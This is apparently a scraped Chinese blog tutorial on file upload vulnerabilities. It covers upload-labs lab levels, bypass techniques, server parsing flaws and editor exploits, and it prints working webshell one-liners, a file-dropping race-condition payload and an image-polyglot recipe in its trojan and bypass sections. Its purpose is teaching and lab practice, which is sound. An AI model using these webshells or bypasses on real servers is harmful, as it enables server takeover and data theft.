网站怎么做域名解析,小程序制作方案,企业培训 电子商务网站建设 图片,聚通达网站建设文章目录#xff1a;
一#xff1a;前言
1.什么是文件上传漏洞
2.环境
2.1 靶场
2.2 其他工具
3.木马分类
二#xff1a;文件上传分类
1.客户端
JS绕过
2.服务端-黑名单
大小写绕过
点和空格绕过
.htaccess文件绕过
php345文件绕过
windows ::$DATA绕过
3.…文章目录
一前言
1.什么是文件上传漏洞
2.环境
2.1 靶场
2.2 其他工具
3.木马分类
二文件上传分类
1.客户端
JS绕过
2.服务端-黑名单
大小写绕过
点和空格绕过
.htaccess文件绕过
php345文件绕过
windows ::$DATA绕过
3.服务端-白名单
MIME验证绕过
%00截断
4.服务端-检查内容
文件头检查内容验证
二次渲染
5.服务端-其他
条件竞争
三漏洞解析
1.Apache解析漏洞
2.Nginx解析漏洞
3.iis6.0解析漏洞
4.iis7.0解析漏洞
四编辑器漏洞 一前言
1.什么是文件上传漏洞 定义文件上传漏洞是指攻击者利用网站或应用程序中的文件上传功能上传恶意文件如木马、病毒、恶意脚本、WebShell等到服务器上并利用服务器的解析漏洞执行这些恶意文件从而获取对服务器的控制权限或进行其他恶意操作危害服务器被完全控制攻击者可以上传并执行任意代码从而完全控制服务器数据泄露攻击者可以访问并下载服务器上的敏感数据如用户个人信息、公司机密等系统资源耗尽恶意文件可能包含消耗大量服务器资源的脚本导致服务拒绝DoS攻击影响系统的可用性和稳定性恶意软件分发服务器可能被用来分发恶意软件进一步危害互联网安全高危触发点相册、头像上传视频、照片上传附件上传论坛发帖、邮箱 文件管理器攻击方式上传恶意脚本如PHP、ASP、JSP等Web脚本语言文件这些文件被服务器解释执行后攻击者可以获取对服务器的控制权限上传病毒或木马这些文件被上传后可能会被诱骗用户或管理员下载执行或者自动运行以危害系统安全上传钓鱼图片或包含脚本的图片在某些版本的浏览器中这些图片可能会被作为脚本执行用于钓鱼和欺诈利用目录遍历攻击通过上传一个指针文件使程序跳转到攻击者的网站或目录从而进行更进一步的攻击防御措施严格的文件类型验证确保只允许上传预定义的安全文件类型并对文件的扩展名进行严格检查文件内容验证使用病毒扫描和恶意代码检测工具对上传的文件进行安全检测文件重命名对上传的文件进行重命名避免直接使用用户上传时的文件名增加攻击者破解文件路径的难度访问控制确保只有授权的用户才能访问和下载上传的文件禁止脚本文件执行将文件上传目录设置为禁止脚本文件执行防止攻击者上传并执行恶意脚本设置文件大小限制在服务器端限制上传文件的大小防止通过上传大文件耗尽服务器资源安全配置和更新正确配置服务器和应用程序禁止执行无关的文件类型并及时更新服务器和应用程序的版本以修复已知的漏洞什么是WebShell以asp、aspx、php、jsp 或者 cgi 等网页文件形式存在的一种代码执行环境主要用于网站管理、服务器管理、权限管理等操作使用方法简单只需上传一个代码文件通过网址访问便可进行很多日常操作对网站和服务器的管理如此也有小部分人将代码修改后当作后门程序使用以达到控制网站服务器的目的webshell管理工具中国菜刀(caidao) (比较落后,有后门)c刀(cknife)Weevely3 (kali中自带)中国蚁剑(AntSword)冰蝎(Behinder)后门一台计算机上有65535个端口每个端口是计算机与外界连接所开启的门 每个门都有计算机提供的一些服务攻击者利用这些服务获取服务器的权限给自己进入计算机留下一个后门 2.环境
2.1 靶场 upload-labs靶场 专门收集渗透测试和CTF中遇到的各种上传漏洞的靶场 第一关:前端JS验证绕过
第二关:MIME绕过
第三关:php345绕过
第四关:.htaccess绕过
第五关:大小写绕过
第六关:空格绕过
第七关:点绕过
第八关:::$DATA绕过
第九关:点空格点拼接绕过
第十关:双文件绕过 phphpp-hpp pphphp-php
第十一关双写后缀绕过
第十二关GET 0X00截断
第十三关POST 0X00截断
第十四关getimagesize图片马
第十五关exif_imagetype图片马
第十六关二次渲染绕过
第十七关条件竞争原理绕过
第十八关apache漏洞条件竞争
第十九关POST 0X00截断
第二十关审计数组后缀绕过 Upload-labs各关卡通关手册分享1、分享2、分享3、分享4、分享5、分享6、分享7、分享8、分享9、分享10 2.2 其他工具 phpSdudy cracer安全工具包 MantraPortableowasp的火狐可以在里面修改网页内容 BurpSuite 安装激活使用详细上手教程 web安全测试工具 WinHex安装与使用检查和修复各种文件、恢复删除文件、硬盘损坏造成的数据丢失等 010 editor进制编辑器 中国菜刀下载安装教程:在虚拟终端输入ipconfig尝试抓取数据包 3.木马分类
文件大小分类一句话木马通常只有一行代码 ? php eval($_POST[pass]?) GIF89a
? php eval($_POST[pass]?) 这里解释一下为什么要加 GIF89a 因为有些 Waf 会检测文件内容而 GIF89a 就是图片内容的头 小马只包含文件上传功能 ?php fputs(fopen(up.php,w), ?php eval($_POST[cmd])?); ? 大马包含很多功能 代码通常会进行加密隐藏 ?php fputs(fopen(base64_decode(dXAucGhw),w),base64_decode(base64_decode(PHP代码编码))); ? 脚本类型分类jsp %Runtime.getRuntime().exec(request.getParameter(“i”)));% asp %eval request(“pass”)% aspx % Page Language“Jscript”%%eval(Request.Item[“pass”])% php ?php eval($_GET[pass]);? ?php eval($_POST[pass]);?
一句话木马的了解 我们要用恶意代码上传到服务器的网站中执行权限远程服务器上被插入一句话的可执行文件? php eval($_POST[fox]?)其中fox可以自己修改种类asp、php、aspx好处短小精悍、功能强大、隐蔽性好 图片一句话木马的制作 cmd制作命令copy fox.jpg/bfox.php/a fox1.jpgb:代表二进制a:代表ASCII 编码第一步图片——右键新建快捷方式——键入对象的位置cmd第二步输入命令copy fox.jpg/bfox.php/a fox1.jpg第三步打开方式notepad就可以看到图片里面有写入的代码uedit制作直接把一句话木马丢进去编码另存为就可以了 二文件上传分类
客户端JS绕过文件上传服务端检查后缀 黑名单 上传特殊可解析后缀上传.htaccess后缀大小写绕过点绕过空格绕过::$DATA绕过配合解析漏洞双后缀名绕过白名单MIME验证绕过%00截断0x00截断0x0a截断检查内容文件头检查内容验证突破getimagesize()函数用于获取图形尺寸突破exif_imagettype()函数用来获取图片类型二次渲染其他条件竞争
1.客户端
JS绕过 JS验证用于客户端本地的验证所有会很快判断你上传的文件类型是否正确第一种JS判断代码onsubmitreturn checkFile()绕过方法删除JS判断代码第二种尝试在允许上传格式的文件里面添加.php格式绕过方法a.jpg|.jpeg|.png|.jpg|.bmp|.php|;第三种1.拷贝源代码在本地分析2.尝试删除js代码3.指定在action中指定上传地址绕过方法本地修改添加上传地址第四种上传允许上传的文件用burp进行抓包改包抓包修改 2.服务端-黑名单
文件扩展名限制是通过客户端黑名单来限制上传文件的类型
大小写绕过 大小写绕过文件上传大小写是把文件拓展名进行Php进行测试绕过Php phP这里需要注意一下Windows和linux下的两个文件名不一样的Windows下文件不区分大小写的linux 下文件是区分大小写的绕过方法修改后缀大小写点和空格绕过 点和空格绕过文件上传是在文件后缀加上点和空格进行绕过文件下在后缀加上空格和点重新命名之后是自动删除所谓的空格和点可以尝试欺骗服务器验证但是系统下是不支持加空格加点的.php空格 这里他会自动解析为.php.php. 这里同理解析为.php.php.空格. 路径拼接尝试绕过绕过方法这里需要利用burp抓包——修改后缀为.php空格 .php就可以验证了 .htaccess文件绕过 .htaccess文件绕过上传提供了针对每个目录改变配置的方法在一个特点的目录中放置一个包含指令的文件其中的指令作用于此目录及其所有子目录.htaccess文件是apache服务器中的一个配置文件它负责相关目录下的网页配置他的功能有网页301重定向、自定义404错误页面、改变文件扩展名、允许/阻止特定的用户或者目录的访问、禁止目录列表、配置默认文档等.htaccess文件代码FilesMatch foxSetHander application/x-httpd-php/FilesMatch绕过方法新建文件——复制代码——修改后缀名 php345文件绕过 php345文件绕过上传代表php版本3 4 5绕过方法新建文件——写入代码——修改文件后缀名filename.php5? php eval($_POST[fox]?) windows ::$DATA绕过 windows ::$DATA绕过上传之内用于windowsNTFS文件系统的存储数据流的一个属性 DATA 时就是请求 a.php 本身的数据如果a.php 还包含了其他的数据流比如 a.php:lake2.php请求 a.asp:lake2.php::$DATA则是请求a.php中的流数据lake2.php的流数据内容简单来说就是在数据后加::$DATA绕过fox.php::$DATA 返回的结果 fox.php绕过方法这里需要利用burp抓包——修改后缀为filename.php::$DATA就可以验证了 apache解析漏洞上传Apache 是从右到左开始判断解析,如果为不可识别解析,就再往左判断比如1.php.xxx对apache来说xxx是不可解析的所以就会解析成1.php 3.服务端-白名单
MIME验证绕过 MIME 类型 | 菜鸟教程 MIME多用途互联网扩展类型是设定某种扩展名的文件用一种应用程序来打开的方式类型当改扩展名文件被访问的时候浏览器会自动使用指定应用程序来打开其实就是服务器判断你上传的什么文件用于指定一些客户端 自定义的文件名以及一些媒体文件打开方式绕过方法修改媒体类型Content-Type:application-stream、抓包修改后缀jpg:image/jpeg php:application/x-httpd-php Windows 系统可执行文件格式:application/octet-stream %00截断 0x00是十六进制表示方法是ascll码为0的字符
在有些函数处理时会把这个字符当做结束符。这个可以用在对文件类型名的绕过上关于00截断get是可以自动转换的post需要对%00进行特殊转换绕过方法get:这里需要利用burp抓包——修改后缀为filename.php%001.jpg就可以验证了post:这里需要利用burp抓包——修改后缀为filename.php%001.jpg就可以验证了需要对%00进行特殊转换convet selection——url——url-decode4.服务端-检查内容
文件头检查内容验证 判断文件头数据filename.gifGIF89a? php eval($_POST[fox]?) 二次渲染 定义当我们上传一张 .jpg/.png/.gif 后缀的图片时网页上显示的并不是我们原先上传的图片而是经过后台加工过的图片这张图片会修改原图的某些部分当然我们的肉眼是看不出来的通过修改原图将原图中插有的恶意代码进行覆盖二次渲染将图片马里面的php代码删了接下来把原图和修改后的图片进行比较看哪里没有被渲染在这里插入php代码图片二次渲染 用于防止图片马上传含有恶意代码的文件绕过办法找出原图不会被二次渲染的区域这就要比较原图和选然后的图片比较未被渲染的区域需要用到工具 010editor在未被渲染的区域插入php代码制作成了一张不会受到二次渲染影响的图片马?php $_GET[0]($_POST[1]);? 5.服务端-其他
条件竞争 $is_upload false;
$msg null;if(isset($_POST[submit])){$ext_arr array(jpg,png,gif);$file_name $_FILES[upload_file][name];$temp_file $_FILES[upload_file][tmp_name];$file_ext substr($file_name,strrpos($file_name,.)1);$upload_file UPLOAD_PATH . / . $file_name;if(move_uploaded_file($temp_file, $upload_file)){if(in_array($file_ext,$ext_arr)){$img_path UPLOAD_PATH . /. rand(10, 99).date(YmdHis)...$file_ext;rename($upload_file, $img_path);$is_upload true;}else{$msg 只允许上传.jpg|.png|.gif类型文件;unlink($upload_file);}}else{$msg 上传出错;}
} 分析以上代码可以看到他的逻辑是先对文件进行了上传操作然后在判断文件的扩展名在不在白名单中如若在进行重命名。不在则对其进行删除 分析1.这么看来如果我们还是上传一个图片马的话网站依旧存在文件包含漏洞我们还是可以进行利用但是如果没有文件包含漏洞的话我们就只能上传一个php木马来解析运行了假设这一题 没有文件包含漏洞的话那我们只要上传php木马就会被删除那还怎么搞2.要知道代码在执行的时候也是需要时间的尽管这个时间特别短只要我们能利用住就会成功如果我们能在上传的一句话被删除之前访问不就成了。这个也就叫做条件竞争上传绕过3.我们可以利用burp多线程发包然后不断在浏览器访问我们的webshell不停的上传会有一瞬间的访问成功定义结合代码审计将文件上传至服务器后不会被立即删除而是做短暂的停留中间会有一小部分时间差这部分时间差是代码进行执行语句if判断的时间这部分时间足够执行一句代码我们利用这段时间差和一段代码就可以达到上传含有恶意代码的非法文件的目的上传的文件从临时目录移动到 upload_file服务器的目录任意类型的文件先上传到服务器上在决定删除不删除绕过方法把这个php文件通过burp一直不停的重放然后我们在开一个burp一直访问我们的这个php文件总会有那么一瞬间是还没来得及删除就可以被访问到的一旦访问到该文件就会在上层目录下生成一个webshell.php的一句话文件这样生成的文件是不会被我们的程序删除掉的a.php?php $str?php eval($_POST[cmd]);? file_put_contents(b.php,$str); ?其他语句参考?php fputs(fopen(shell.php,w), ?php phpinfo() ?)?其他语句参考?php fputs(fopen(shell.php,w),?php eval($_POST[a])?);? 在a.php 在后台短暂停留的时间内只要访问它并执行代码它就会在 upload中创建b.php文件达到上传非法文件的目的b.php里面的内容会生成?php eval($_POST[cmd]); 三漏洞解析
1.Apache解析漏洞 Apache解析漏洞Apache 是从右到左开始判断解析,如果为不可识别解析,就再往左判断比如1.php.xxx对apache来说xxx是不可解析的所以就会解析成1.php如aa.php.owf.rar文件Apache不可识别解析rar和owf便会解析成php文件2.Nginx解析漏洞 Nginx解析漏洞Nginx的解析漏洞通常与文件扩展名的处理和URL路径的解析有关一个典型的例子是Nginx在处理特定URL时可能会错误地将请求映射到不期望的文件上环境配置Nginx作为Web服务器服务器配置允许上传文件并存储在某个可访问的目录中Nginx的某些配置可能允许通过修改URL来绕过文件类型检查漏洞利用攻击者在网站上传一个看似无害的图片文件如malicious.jpg但该文件实际上包含恶意代码例如通过修改文件头或使用特殊的编码技术攻击者通过构造特定的URL如http://example.com/uploads/malicious.jpg%00.php尝试访问该文件Nginx可能会错误地将请求映射到malicious.jpg文件但由于URL中的%00空字符截断服务器可能会忽略.jpg扩展名并尝试将请求作为PHP文件处理 3.iis6.0解析漏洞 iis6.0解析漏洞1、目录解析以*.asp命名的文件夹里的文件都将会被当成ASP文件执行形式www.xxx.com/xx.asp/xx.jpg比如1.asp/1.jpg这里1.jpg会被当做asp文件执行2、文件解析*.asp;.jpg 像这种畸形文件名在“;”后面的直接被忽略也就是说当成 *.asp文件执行形式www.xxx.com/xx.asp;.jpg比如1.asp;1.jpg命名的文件同样是以asp脚本进行执行4.iis7.0解析漏洞 IIS7.0解析漏洞在IIS7.0中一个常见的解析漏洞与文件扩展名的处理有关尤其是在FastCGI模式下当php.ini配置文件中的cgi.fix_pathinfo选项被设置为1时可能会出现文件解析漏洞这个漏洞允许攻击者通过特定的URL构造使服务器错误地将非PHP文件当作PHP文件来执行环境配置IIS7.0安装在Windows Server上PHP作为后端脚本语言通过FastCGI与IIS集成php.ini中的cgi.fix_pathinfo选项被设置为1漏洞利用攻击者在网站上传一个包含PHP代码的图片文件如shell.jpg该文件实际上是一个PHP木马攻击者通过构造URL如http://example.com/uploads/shell.jpg/.php尝试访问该文件由于cgi.fix_pathinfo被设置为1IIS会将请求中的.php部分视为对PHP文件的请求并尝试执行shell.jpg文件内的PHP代码影响攻击者可以执行任意PHP代码从而控制服务器或访问敏感数据四编辑器漏洞 分类不需要后台验证可以直接在前台访问且操作需要后台验证才可以操作编辑器常用的编辑器有FCKeditorEWEbeditorCKFinderUEDITORDotNetTextBoxCute Editor编辑器漏洞利用(1)找到编辑器:我们可以看编辑器路径的文件名来判断是什么编辑器(2)确认版本(3)去搜索该版本编辑器的漏洞利用 FCK编辑器漏洞利用 FCKeditor常见上传目录:FCKeditor/editor/filemanager/browser/default/connectors/test.htmlFCKeditor/editor/filemanager/upload/test.htmlFCKeditor/editor/filemanager/connectors/test.htmlFCKeditor/editor/filemanager/connectors/uploadtest.htmlfck“”变“”绕过方法在高版本fck中直接上传或抓包修改文件名为a.asp;jpg都会将前面的点变成下划线也就是变成这样:a_asp,jpg这样我们的文件名解析就无效果了绕过方法:突破建立文件夹(实质就是利用我们iis6的目录解析) EWEbeditor编辑器漏洞 (1)进后台eweb编辑器默认数据库地址是:ewebeditor/db/ewebeditor.mdb(2)eweb遍历漏洞ewebeditor/admin uploadfile.asp?id14dir../(3)修改样式表上传文件
